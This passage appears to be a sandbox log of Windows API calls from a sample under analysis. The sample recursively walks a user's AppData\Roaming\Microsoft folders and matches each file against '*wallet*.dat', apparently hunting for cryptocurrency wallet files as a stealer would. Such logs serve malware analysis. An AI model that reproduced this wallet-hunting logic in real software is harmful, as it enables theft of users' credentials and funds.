param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned 98 [0207.420] StrCmpCA (pszStr1="Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", pszStr2="") returned 77 [0207.420] wsprintfA (in: param_1=0x19b7a8, param_2="%s\\%s" | out: param_1="Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned 60 [0207.420] PathMatchSpecA (pszFile="TaskBar", pszSpec="*wallet*.dat") returned 0 [0207.420] wsprintfA (in: param_1=0x19b370, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*") returned 100 [0207.420] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*", lpFindFileData=0x19b228 | out: lpFindFileData=0x19b228*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xad13dd79, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xad164063, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xad18a23e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e7788 [0207.420] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0207.420] FindNextFileA (in: hFindFile=0x5e7788, lpFindFileData=0x19b228 | out: lpFindFileData=0x19b228*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xad13dd79, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xad164063, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xad18a23e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.420] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0207.420] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0207.420] FindNextFileA (in: hFindFile=0x5e7788, lpFindFileData=0x19b228 | out: lpFindFileData=0x19b228*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xad164063, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xad164063, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xad18a23e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x53, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0207.420] StrCmpCA (pszStr1="desktop.ini", pszStr2=".") returned 54 [0207.421] StrCmpCA (pszStr1="desktop.ini", pszStr2="..") returned 54 [0207.421] wsprintfA (in: param_1=0x19b018, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini") returned 110 [0207.421] StrCmpCA (pszStr1="Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", pszStr2="") returned 77 [0207.421] wsprintfA (in: param_1=0x19b120, param_2="%s\\%s" | out: param_1="Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini") returned 72 [0207.421] PathMatchSpecA (pszFile="desktop.ini", pszSpec="*wallet*.dat") returned 0 [0207.421] wsprintfA (in: param_1=0x19ace8, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini\\*") returned 112 [0207.421] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini\\*", lpFindFileData=0x19aba0 | out: lpFindFileData=0x19aba0*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xad164063, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xad164063, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xad18a23e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x53, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="d", cAlternateFileName="J")) returned 0xffffffff [0207.421] FindNextFileA (in: hFindFile=0x5e7788, lpFindFileData=0x19b228 | out: lpFindFileData=0x19b228*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad164063, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xad164063, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x252988fc, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x197, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="File Explorer.lnk", cAlternateFileName="FILEEX~1.LNK")) returned 1 [0207.421] StrCmpCA (pszStr1="File Explorer.lnk", pszStr2=".") returned 24 [0207.421] StrCmpCA (pszStr1="File Explorer.lnk", pszStr2="..") returned 24 [0207.421] wsprintfA (in: param_1=0x19b018, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\File Explorer.lnk") returned 116 [0207.421] StrCmpCA (pszStr1="Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", pszStr2="") returned 77 [0207.421] wsprintfA (in: param_1=0x19b120, param_2="%s\\%s" | out: param_1="Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\File Explorer.lnk") returned 78 [0207.421] PathMatchSpecA (pszFile="File Explorer.lnk", pszSpec="*wallet*.dat") returned 0 [0207.421] wsprintfA (in: param_1=0x19ace8, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\File Explorer.lnk\\*") returned 118 [0207.421] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\File Explorer.lnk\\*", lpFindFileData=0x19aba0 | out: lpFindFileData=0x19aba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad164063, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xad164063, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x252988fc, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x197, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="F", cAlternateFileName="J")) returned 0xffffffff [0207.421] FindNextFileA (in: hFindFile=0x5e7788, lpFindFileData=0x19b228 | out: lpFindFileData=0x19b228*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad164063, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xad164063, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x252988fc, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x197, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="File Explorer.lnk", cAlternateFileName="FILEEX~1.LNK")) returned 0 [0207.422] FindClose (in: hFindFile=0x5e7788 | out: hFindFile=0x5e7788) returned 1 [0207.422] FindNextFileA (in: hFindFile=0x5e7a48, lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xad13dd79, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xad164063, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xad18a23e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TaskBar", cAlternateFileName="")) returned 0 [0207.422] FindClose (in: hFindFile=0x5e7a48 | out: hFindFile=0x5e7a48) returned 1 [0207.422] FindNextFileA (in: hFindFile=0x5e7e48, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d02d92b, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d02d92b, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x252261fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x14e, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Window Switcher.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0207.422] StrCmpCA (pszStr1="Window Switcher.lnk", pszStr2=".") returned 41 [0207.422] StrCmpCA (pszStr1="Window Switcher.lnk", pszStr2="..") returned 41 [0207.422] wsprintfA (in: param_1=0x19bd28, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk") returned 98 [0207.422] StrCmpCA (pszStr1="Microsoft\\Internet Explorer\\Quick Launch", pszStr2="") returned 77 [0207.422] wsprintfA (in: param_1=0x19be30, param_2="%s\\%s" | out: param_1="Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk") returned 60 [0207.422] PathMatchSpecA (pszFile="Window Switcher.lnk", pszSpec="*wallet*.dat") returned 0 [0207.422] wsprintfA (in: param_1=0x19b9f8, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk\\*") returned 100 [0207.422] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk\\*", lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d02d92b, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d02d92b, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x252261fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x14e, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="W", cAlternateFileName="")) returned 0xffffffff [0207.422] FindNextFileA (in: hFindFile=0x5e7e48, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d02d92b, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d02d92b, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x252261fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x14e, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Window Switcher.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 0 [0207.422] FindClose (in: hFindFile=0x5e7e48 | out: hFindFile=0x5e7e48) returned 1 [0207.423] FindNextFileA (in: hFindFile=0x5e7e08, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="UserData", cAlternateFileName="")) returned 1 [0207.423] StrCmpCA (pszStr1="UserData", pszStr2=".") returned 39 [0207.423] StrCmpCA (pszStr1="UserData", pszStr2="..") returned 39 [0207.423] wsprintfA (in: param_1=0x19c3b0, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData") returned 74 [0207.423] StrCmpCA (pszStr1="Microsoft\\Internet Explorer", pszStr2="") returned 77 [0207.423] wsprintfA (in: param_1=0x19c4b8, param_2="%s\\%s" | out: param_1="Microsoft\\Internet Explorer\\UserData") returned 36 [0207.423] PathMatchSpecA (pszFile="UserData", pszSpec="*wallet*.dat") returned 0 [0207.423] wsprintfA (in: param_1=0x19c080, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*") returned 76 [0207.423] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*", lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e7e48 [0207.449] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0207.449] FindNextFileA (in: hFindFile=0x5e7e48, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.449] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0207.449] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0207.449] FindNextFileA (in: hFindFile=0x5e7e48, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Low", cAlternateFileName="")) returned 1 [0207.449] StrCmpCA (pszStr1="Low", pszStr2=".") returned 30 [0207.449] StrCmpCA (pszStr1="Low", pszStr2="..") returned 30 [0207.450] wsprintfA (in: param_1=0x19bd28, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low") returned 78 [0207.450] StrCmpCA (pszStr1="Microsoft\\Internet Explorer\\UserData", pszStr2="") returned 77 [0207.450] wsprintfA (in: param_1=0x19be30, param_2="%s\\%s" | out: param_1="Microsoft\\Internet Explorer\\UserData\\Low") returned 40 [0207.450] PathMatchSpecA (pszFile="Low", pszSpec="*wallet*.dat") returned 0 [0207.450] wsprintfA (in: param_1=0x19b9f8, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*") returned 80 [0207.450] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*", lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e7748 [0207.451] FindNextFileA (in: hFindFile=0x5e7748, lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.451] FindNextFileA (in: hFindFile=0x5e7748, lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 0 [0207.451] FindClose (in: hFindFile=0x5e7748 | out: hFindFile=0x5e7748) returned 1 [0207.451] FindNextFileA (in: hFindFile=0x5e7e48, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Low", cAlternateFileName="")) returned 0 [0207.451] FindClose (in: hFindFile=0x5e7e48 | out: hFindFile=0x5e7e48) returned 1 [0207.451] FindNextFileA (in: hFindFile=0x5e7e08, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="UserData", cAlternateFileName="")) returned 0 [0207.451] FindClose (in: hFindFile=0x5e7e08 | out: hFindFile=0x5e7e08) returned 1 [0207.451] FindNextFileA (in: hFindFile=0x5e7b48, lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3704a98f, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x3704a98f, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x3704a98f, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="MMC", cAlternateFileName="")) returned 1 [0207.452] wsprintfA (in: param_1=0x19ca38, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\MMC") returned 51 [0207.452] wsprintfA (in: param_1=0x19cb40, param_2="%s\\%s" | out: param_1="Microsoft\\MMC") returned 13 [0207.452] PathMatchSpecA (pszFile="MMC", pszSpec="*wallet*.dat") returned 0 [0207.452] wsprintfA (in: param_1=0x19c708, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\MMC\\*") returned 53 [0207.452] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\MMC\\*", lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3704a98f, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x3704a98f, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x3704a98f, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e7a48 [0207.453] FindNextFileA (in: hFindFile=0x5e7a48, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3704a98f, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x3704a98f, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x3704a98f, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.453] FindNextFileA (in: hFindFile=0x5e7a48, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3704a98f, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x3704a98f, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x3704a98f, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 0 [0207.453] FindClose (in: hFindFile=0x5e7a48 | out: hFindFile=0x5e7a48) returned 1 [0207.453] FindNextFileA (in: hFindFile=0x5e7b48, lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Network", cAlternateFileName="")) returned 1 [0207.454] wsprintfA (in: param_1=0x19ca38, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network") returned 55 [0207.454] wsprintfA (in: param_1=0x19cb40, param_2="%s\\%s" | out: param_1="Microsoft\\Network") returned 17 [0207.454] PathMatchSpecA (pszFile="Network", pszSpec="*wallet*.dat") returned 0 [0207.454] wsprintfA (in: param_1=0x19c708, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\*") returned 57 [0207.454] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\*", lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e7e08 [0207.455] FindNextFileA (in: hFindFile=0x5e7e08, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.455] FindNextFileA (in: hFindFile=0x5e7e08, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 1 [0207.455] wsprintfA (in: param_1=0x19c3b0, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections") returned 67 [0207.455] wsprintfA (in: param_1=0x19c4b8, param_2="%s\\%s" | out: param_1="Microsoft\\Network\\Connections") returned 29 [0207.455] PathMatchSpecA (pszFile="Connections", pszSpec="*wallet*.dat") returned 0 [0207.455] wsprintfA (in: param_1=0x19c080, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*") returned 69 [0207.459] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e7e48 [0207.459] FindNextFileA (in: hFindFile=0x5e7e48, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.459] FindNextFileA (in: hFindFile=0x5e7e48, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Pbk", cAlternateFileName="")) returned 1 [0207.459] wsprintfA (in: param_1=0x19bd28, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk") returned 71 [0207.459] wsprintfA (in: param_1=0x19be30, param_2="%s\\%s" | out: param_1="Microsoft\\Network\\Connections\\Pbk") returned 33 [0207.459] PathMatchSpecA (pszFile="Pbk", pszSpec="*wallet*.dat") returned 0 [0207.459] wsprintfA (in: param_1=0x19b9f8, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*") returned 73 [0207.459] FindFirstFileA (in: 